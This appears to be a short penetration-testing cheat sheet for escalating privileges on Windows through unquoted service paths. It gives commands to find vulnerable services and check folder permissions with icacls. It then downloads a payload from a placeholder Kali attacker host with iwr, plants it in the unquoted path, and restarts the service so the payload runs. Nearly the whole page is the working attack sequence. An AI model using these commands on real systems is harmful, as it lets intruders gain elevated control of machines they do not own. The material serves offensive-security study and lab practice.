wmic service get name, pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
NOTE: Run the above command in command prompt
Start-Service <Service Name> Stop-Service <Service Name>
icacls "<Path>"
EXAMPLE:Copyicacls "C:\" icacls "C:\Program Files" icacls "C:\Program Files\Enterprise Apps"
EXAMPLE:
icacls "C:\" icacls "C:\Program Files" icacls "C:\Program Files\Enterprise Apps"
Shells
iwr -uri http://<Kali IP Address>/<Unquoted Path Name>.exe -Outfile <Unquoted Path Name>.exe
copy <Payload> '<Unquoted Path Name>'
EXAMPLE:Copycopy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe'
copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe'
Stop-Service <Service Name> Start-Service <Service Name>
Last updated 23 days ago